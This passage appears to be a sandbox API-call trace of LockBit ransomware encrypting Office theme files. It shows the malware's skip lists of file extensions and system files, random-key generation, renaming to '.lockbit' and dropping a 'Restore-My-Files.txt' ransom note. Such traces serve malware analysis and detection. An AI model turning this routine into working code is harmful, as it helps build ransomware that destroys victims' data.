(lpString1=".hlp", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Elemental.thmx") returned 1 [0187.498] lstrcmpiW (lpString1="ntldr", lpString2="Elemental.thmx") returned 1 [0187.498] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Elemental.thmx") returned 1 [0187.498] lstrcmpiW (lpString1="bootsect.bak", lpString2="Elemental.thmx") returned -1 [0187.498] lstrcmpiW (lpString1="autorun.inf", lpString2="Elemental.thmx") returned -1 [0187.498] lstrcmpiW (lpString1="thumbs.db", lpString2="Elemental.thmx") returned 1 [0187.498] lstrcmpiW (lpString1="iconcache.db", lpString2="Elemental.thmx") returned 1 [0187.498] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.498] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Elemental.thmx") returned=".thmx" [0187.498] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.498] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.499] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.499] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Elemental.thmx.lockbit") returned 76 [0187.499] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Elemental.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\elemental.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0187.505] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.505] malloc (_Size=0x40068) returned 0x1ff1e60 [0187.505] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=349663) returned 1 [0187.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0187.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0187.506] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0187.510] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Elemental.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Elemental.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.510] malloc (_Size=0xae) returned 0x1fa2ed8 [0187.510] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0187.512] free (_Block=0x1fa2ed8) [0187.512] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Elemental.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.512] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.512] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.512] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2d000, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5abff20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xac2d000, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x10f61, dwReserved0=0x0, dwReserved1=0x0, cFileName="Equity.thmx", cAlternateFileName="EQUITY~1.THM")) returned 1 [0187.512] lstrcmpiW (lpString1=".", lpString2="Equity.thmx") returned -1 [0187.512] lstrcmpiW (lpString1="..", lpString2="Equity.thmx") returned -1 [0187.512] PathFindExtensionW (pszPath="Equity.thmx") returned=".thmx" [0187.512] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.512] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.512] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.512] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.512] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.512] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.512] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.512] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.512] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.513] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.513] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.514] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Equity.thmx") returned 1 [0187.514] lstrcmpiW (lpString1="ntldr", lpString2="Equity.thmx") returned 1 [0187.514] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Equity.thmx") returned 1 [0187.514] lstrcmpiW (lpString1="bootsect.bak", lpString2="Equity.thmx") returned -1 [0187.514] lstrcmpiW (lpString1="autorun.inf", lpString2="Equity.thmx") returned -1 [0187.514] lstrcmpiW (lpString1="thumbs.db", lpString2="Equity.thmx") returned 1 [0187.514] lstrcmpiW (lpString1="iconcache.db", lpString2="Equity.thmx") returned 1 [0187.515] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.515] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Equity.thmx") returned=".thmx" [0187.515] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.515] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.515] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.516] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.516] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.516] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.516] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.516] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.516] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.516] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.516] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.516] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.516] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Equity.thmx.lockbit") returned 73 [0187.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Equity.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\equity.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0187.521] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.521] malloc (_Size=0x40068) returned 0x3d70450 [0187.521] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=69473) returned 1 [0187.521] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0187.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0187.522] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0187.526] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Equity.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Equity.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.526] malloc (_Size=0xa8) returned 0x1fa2ed8 [0187.526] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0187.527] free (_Block=0x1fa2ed8) [0187.527] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Equity.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.527] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.527] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.528] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x478ec700, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5abff20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x478ec700, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xc278, dwReserved0=0x0, dwReserved1=0x0, cFileName="Essential.thmx", cAlternateFileName="ESSENT~1.THM")) returned 1 [0187.528] lstrcmpiW (lpString1=".", lpString2="Essential.thmx") returned -1 [0187.528] lstrcmpiW (lpString1="..", lpString2="Essential.thmx") returned -1 [0187.528] PathFindExtensionW (pszPath="Essential.thmx") returned=".thmx" [0187.528] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.528] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.529] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.529] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Essential.thmx") returned 1 [0187.530] lstrcmpiW (lpString1="ntldr", lpString2="Essential.thmx") returned 1 [0187.530] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Essential.thmx") returned 1 [0187.530] lstrcmpiW (lpString1="bootsect.bak", lpString2="Essential.thmx") returned -1 [0187.530] lstrcmpiW (lpString1="autorun.inf", lpString2="Essential.thmx") returned -1 [0187.530] lstrcmpiW (lpString1="thumbs.db", lpString2="Essential.thmx") returned 1 [0187.530] lstrcmpiW (lpString1="iconcache.db", lpString2="Essential.thmx") returned 1 [0187.530] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.530] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Essential.thmx") returned=".thmx" [0187.530] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.530] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.530] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.531] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.531] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Essential.thmx.lockbit") returned 76 [0187.531] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Essential.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\essential.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0187.537] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.537] malloc (_Size=0x40068) returned 0x3f70048 [0187.538] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=49784) returned 1 [0187.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0187.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.539] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0187.539] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0187.541] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Essential.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Essential.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.541] malloc (_Size=0xae) returned 0x1fa2ed8 [0187.541] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0187.542] free (_Block=0x1fa2ed8) [0187.542] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Essential.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.542] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.543] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.543] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x773dcf00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5ae6080, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x773dcf00, ftLastWriteTime.dwHighDateTime=0x1cbded9, 